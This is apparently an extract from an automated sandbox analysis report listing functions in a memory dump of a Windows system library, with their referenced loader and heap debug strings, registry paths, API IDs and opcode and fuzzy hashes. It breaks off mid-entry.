                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: ffd9e6086861b606b29fb02dfdf7c56f6db505dd2c4d5f9eeebc704e7695c466
                                                  • Instruction ID: d3df8df66fcec4112121f26cabea454afe6a150b469845ee74925946d0b1ca1f
                                                  • Opcode Fuzzy Hash: ffd9e6086861b606b29fb02dfdf7c56f6db505dd2c4d5f9eeebc704e7695c466
                                                  • Instruction Fuzzy Hash: C251FF74F00786DFF711CB68D884B1A77E4EB41758F5006AAE8529B6E1DB78E900EF40
                                                  Function 345AD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 345AD7B2
                                                  • HEAP[%wZ]: , xrefs: 345AD792
                                                  • HEAP: , xrefs: 345AD79F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: 1fb3317333278fcda796c1d8381051d9f1b53d867199e4d43c32034b852d6043
                                                  • Instruction ID: 426c20f0a3d9e927dc6c5f42c65f61ed00e7433afd67ebaf9c2f24b9f296dc66
                                                  • Opcode Fuzzy Hash: 1fb3317333278fcda796c1d8381051d9f1b53d867199e4d43c32034b852d6043
                                                  • Instruction Fuzzy Hash: E7514478A00350CEF35AEE29D84477A73E7EB45284F544C9EE4C58B691DA36D80BFB20
                                                  Function 344F753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: 5083c4f3f288974dc11541c1098a8758172e83184d9097b920dd7b7e0f605555
                                                  • Instruction ID: 5fc9b372f4646c7824cd65dc0678f705a0fbdf7e4c41c3de0c1f1c32bf8efec7
                                                  • Opcode Fuzzy Hash: 5083c4f3f288974dc11541c1098a8758172e83184d9097b920dd7b7e0f605555
                                                  • Instruction Fuzzy Hash: 64414A78A003809FFF25EE18D980B7577E0DF01355F6444FED5868BA62CABAD846DB21
                                                  Function 345315EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrpAllocateTls, xrefs: 3457194A
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34571943
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 34571954
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: 3579610602670e3886b2fb2b6cf0647ce50b0421eccd1ecaec1c3a27da9a21bc
                                                  • Instruction ID: 9eed0d2520611a0297cfb304c3a9fda91a153d4c15420b65cc7e9c2d442adebf
                                                  • Opcode Fuzzy Hash: 3579610602670e3886b2fb2b6cf0647ce50b0421eccd1ecaec1c3a27da9a21bc
                                                  • Instruction Fuzzy Hash: 334148B5E01609EFEB15CFA8D841BAEBBB5FF88340F448529E406A7351DB35A901EF50
                                                  Function 3450A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 3450A229
                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 3450A21B
                                                  • @SM4, xrefs: 3450A268
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @SM4$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                  • API String ID: 0-683077498
                                                  • Opcode ID: 67efce1676de98acf8bad52dadfdb56dbef6f7e959c89e19c45b0892d8c32028
                                                  • Instruction ID: 4c59e55f704a7fe9187bcd973b2f79cac70acaa9aac1c668d510cdb5d477f27c
                                                  • Opcode Fuzzy Hash: 67efce1676de98acf8bad52dadfdb56dbef6f7e959c89e19c45b0892d8c32028
                                                  • Instruction Fuzzy Hash: BC41BA79F00746CBEB01DF99E450B5D77B8EF95744F1084A9E800DB2A1EA3ACD44EB01
                                                  Function 3458B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • GlobalFlag, xrefs: 3458B30F
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3458B2B2
                                                  • @, xrefs: 3458B2F0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: a43e638be37cce7c21d3f7a54c93461b385a2948fcbbbe1d7fc478cadfb24478
                                                  • Instruction ID: 35bce4fb9058a5bec0edd5abb4abdd7a9374e344b3820f906b0ee6158cd507a6
                                                  • Opcode Fuzzy Hash: a43e638be37cce7c21d3f7a54c93461b385a2948fcbbbe1d7fc478cadfb24478
                                                  • Instruction Fuzzy Hash: E03130B5E00209AFEB10DF94DC80AEEBB7CEF44744F800469FA11AB251DB749A44DB94
                                                  Function 34531527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3457184A
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3457185B
                                                  • LdrpInitializeTls, xrefs: 34571851
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 500c2f05bb99c940327d8826ae5c38236869dc3ffe12f4a533493bc04745a334
                                                  • Instruction ID: a587f842eed00f50e79a94fa3d30a98b689916125115ba9fa2b351bc74b8daf1
                                                  • Opcode Fuzzy Hash: 500c2f05bb99c940327d8826ae5c38236869dc3ffe12f4a533493bc04745a334
                                                  • Instruction Fuzzy Hash: 8C31D171E01208EFF7108F64CC85B6A7BA9FB84395F410569F502F7281EB70EE45AB91
                                                  Function 345885AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 345885DE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                  • API String ID: 0-702105204
                                                  • Opcode ID: 010ec0b12f4ada884075b57696e9d2cd8dc7b2009f60d5ba40abecd41375b01a
                                                  • Instruction ID: 58486d15d28f3e6afeab5fff398948f55b789431b1818a58a88dd7ce3b28ba19
                                                  • Opcode Fuzzy Hash: 010ec0b12f4ada884075b57696e9d2cd8dc7b2009f60d5ba40abecd41375b01a
                                                  • Instruction Fuzzy Hash: E001263AF00604EFEB615F92EC84E5A3B65FF903A0F80096CE50167553CF21A881FE99
                                                  Function 345151C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@
                                                  • API String ID: 0-149943524
                                                  • Opcode ID: bf622e9ab70d567f6ff75265b045780655d7dd59f93fa1a5009cd487811f8794
                                                  • Instruction ID: c16855596eacab5d65c4f0df5881550b91c2b18b413db70782bf301bda008ec8
                                                  • Opcode Fuzzy Hash: bf622e9ab70d567f6ff75265b045780655d7dd59f93fa1a5009cd487811f8794
                                                  • Instruction Fuzzy Hash: C232AFB4908355CFEB648F14D480B2EB7E5EF84744F91492EF9968B3A0E734D844EB92
                                                  Function 34505622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 4fc99d461b7e9fa40818cad6f94960087f6656f99ee70f2be5a3c2b92a6aee97
                                                  • Instruction ID: 435d183d1980647c1d4bdfc01c671466e15916f841fb5e7b48022acdc3fdd7cd
                                                  • Opcode Fuzzy Hash: 4fc99d461b7e9fa40818cad6f94960087f6656f99ee70f2be5a3c2b92a6aee97
                                                  • Instruction Fuzzy Hash: FC31E039B01B06EFE781DF24C950A8AFB69FF84794F409125E90197A60DB70E821EF80
                                                  Function 3457E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: e8f6e7619459aa40ab20727acf5287a4ce983af432c2c42fca87588ec1f08d1e
                                                  • Instruction ID: e548780021929d537ab7d4515a216932ae18b1b21815ac96d0c80b4e829ea0fd
                                                  • Opcode Fuzzy Hash: e8f6e7619459aa40ab20727acf5287a4ce983af432c2c42fca87588ec1f08d1e
                                                  • Instruction Fuzzy Hash: 716139B1E807189FEB15CFA8C840BADBBB9BF48740F50447EE549EB251EA30E941DB50
                                                  Function 345DB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RedirectedKey, xrefs: 345DB60E
                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 345DB5C4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                  • API String ID: 0-1388552009
                                                  • Opcode ID: 81504957dffb7081a5bd8bd69d49c096f719314d23c84189558e21586cfbd4b2
                                                  • Instruction ID: 8c7f97580508220886cba1112d290e5a6f2582e1e79253a4ee0f089e5e1efd67
                                                  • Opcode Fuzzy Hash: 81504957dffb7081a5bd8bd69d49c096f719314d23c84189558e21586cfbd4b2
                                                  • Instruction Fuzzy Hash: C26105B5C01218EFEF11DF98C948ADEBBB9FF09714F50406AE405A7250DB359A45DF90
                                                  Function 3451F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  • Opcode ID: 7acc425d3539d567424ee50f9d2b518ebd7affa7c76b33ef5a0c59521bba02e6
                                                  • Instruction ID: 664cf2c74aee483db8eae2454ab2d72de0ac3a558f33d0d0780b07de827bafb4
                                                  • Opcode Fuzzy Hash: 7acc425d3539d567424ee50f9d2b518ebd7affa7c76b33ef5a0c59521bba02e6
                                                  • Instruction Fuzzy Hash: 7B61BCB6E01749DFFB20CFA4D580B9DB7B1FF84308F908469D505AB692CB74A941EB90
                                                  Function 3459314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: 4c509ce6a5d6ad74eeedae25fcf2f5843ad99b1fd6e8da6d834a8387ddf90cfe
                                                  • Instruction ID: 4c9014978270971eb84e8d19e5bf84b6fbd112e152f43f2f2bb5bf6fc6962d65
                                                  • Opcode Fuzzy Hash: 4c509ce6a5d6ad74eeedae25fcf2f5843ad99b1fd6e8da6d834a8387ddf90cfe
                                                  • Instruction Fuzzy Hash: FD31DC75A08780CFE705CB68E850B5AB7E8EFD9754F40086DF854CB390EA30D905EB52
                                                  Function 345006CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O4$ O4
                                                  • API String ID: 0-2042910260
                                                  • Opcode ID: 09306c423ae0bca47e715234eb053735fdfc85d99a404f1f73d113c578c479d9
                                                  • Instruction ID: 7412cae5790d26169ceed645a1967ff1f1340a6f7cf99492adb2db647696c000
                                                  • Opcode Fuzzy Hash: 09306c423ae0bca47e715234eb053735fdfc85d99a404f1f73d113c578c479d9
                                                  • Instruction Fuzzy Hash: A531A23BE047119FE711DE24A890E6B77A9EFC4AA0F018969FC1597210EB34DC05AFA1
                                                  Function 345331BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local\$@
                                                  • API String ID: 0-380025441
                                                  • Opcode ID: 67340ab72df31a6cc14ebb4956ce0e8ea735dbc5c3b64105a27dc86faa247f4a
                                                  • Instruction ID: eb34679419911a5f71ab9e140138cca85c52dff1721bb8a9b0e65b135a51e31e
                                                  • Opcode Fuzzy Hash: 67340ab72df31a6cc14ebb4956ce0e8ea735dbc5c3b64105a27dc86faa247f4a
                                                  • Instruction Fuzzy Hash: 823190B194A301EFE311CF28C880A5FBBE8FB95694F44092EF99487250D634DD09AB92
                                                  Function 3450C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  • Opcode ID: 759fb0e2069473ff2b692f89ace5b393eb2e044b6352a877a8e43ad53e83b95e
                                                  • Instruction ID: 628abb4e9454afa167b14497e91f0a5463ef3ddc3d467c779163045e0d15b1c2
                                                  • Opcode Fuzzy Hash: 759fb0e2069473ff2b692f89ace5b393eb2e044b6352a877a8e43ad53e83b95e
                                                  • Instruction Fuzzy Hash: 56825B79E003089FEB25CFA9D88079DB7B5FF49350F50C169E819AB290EB309985EF50
                                                  Function 345064F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ef840a3b0993b29dd5b54e341204fb6c042294d99a0ef021f2fc8de17cd2625
                                                  • Instruction ID: 63b5cb8d86da50354489121ab97f92430951a6575350ec77904bc8cd555fef8f
                                                  • Opcode Fuzzy Hash: 3ef840a3b0993b29dd5b54e341204fb6c042294d99a0ef021f2fc8de17cd2625
                                                  • Instruction Fuzzy Hash: 5EE18C79A09342CFD714CF28C090A5ABBE0FF89354F448A6DE4859B361DB31E905DF92
                                                  Function 3452B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @[_4@[_4
                                                  • API String ID: 0-595470575
                                                  • Opcode ID: 0641b4ad10336c2b2e5a46b34b21639740f510f5898729cd57b61cdd1fcd8441
                                                  • Instruction ID: 600ecaa6dccd749b124f4134a17ccf28fa4d4f283017d2d692bbe1b520f86d51
                                                  • Opcode Fuzzy Hash: 0641b4ad10336c2b2e5a46b34b21639740f510f5898729cd57b61cdd1fcd8441
                                                  • Instruction Fuzzy Hash: 4C329EB6E01219DFDB14CFA8D880BAEBBB5FF94754F54012EE805AB390E7359901DB90
                                                  Function 3452E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cbda59709b97e3dd510acd72ebd2b6f0062514a9f15185d2d2a115bf80f3da86
                                                  • Instruction ID: 5f32473d944dacd4b2e5f4e0c58a21f3436da880eb7a442b698da1e7e701c0ab
                                                  • Opcode Fuzzy Hash: cbda59709b97e3dd510acd72ebd2b6f0062514a9f15185d2d2a115bf80f3da86
                                                  • Instruction Fuzzy Hash: 7EA10472F40315EFFB21CBA4D844B9E7BA4AF48758F050166E911EB2D0DB78AD40EB81
                                                  Function 34501051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 9074b1e17b1358e934345d5208eb569364a4a5d468ca7e8ce70b84c34618cea9
                                                  • Instruction ID: e79d310b3ddbe6dda88c9a858f8c9fe1016a74b78531ffdcd15ef9526c3bccb3
                                                  • Opcode Fuzzy Hash: 9074b1e17b1358e934345d5208eb569364a4a5d468ca7e8ce70b84c34618cea9
                                                  • Instruction Fuzzy Hash: 16B104B5A093808FE754CF28C480A5AFBF1BB88304F54896EF899DB352D771E945DB42
                                                  Function 34507623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 783e64371bd36cc0676d70ed7ab4ec1ecd2b7deedfc0d1e3e459513bbb2157cf
                                                  • Instruction ID: 3db9451991e75c5c1b0157e3483c7c859f79c805e078d978104c7ecb5b1289f8
                                                  • Opcode Fuzzy Hash: 783e64371bd36cc0676d70ed7ab4ec1ecd2b7deedfc0d1e3e459513bbb2157cf
                                                  • Instruction Fuzzy Hash: 64615F79E01606EFEB08DF68C480A9DFBB5BF88344F24826AD419A7310DB34A951DF90
                                                  Function 3450254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 5abb84a1c90274d716144424564313c8c5d8072f18afec842fdfca37e786f842
                                                  • Instruction ID: 6711af424c632c1f1a4a4cef8fdb5fd359b46905a383f8733d2406f84a470d7b
                                                  • Opcode Fuzzy Hash: 5abb84a1c90274d716144424564313c8c5d8072f18afec842fdfca37e786f842
                                                  • Instruction Fuzzy Hash: A6415979D02704CFE725CF24D950A59B7F6FF84354F9086AAE4069B2A0DB30A942EF41
                                                  Function 34504779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 051f3863853df47843557ffc504dc1e4b8e03fd3e91adbeb80324b5baace3e81
                                                  • Instruction ID: 3c484e27ba0024b3014da60bff14490123c7ec0a282a7902de76f2a83c63d6a9
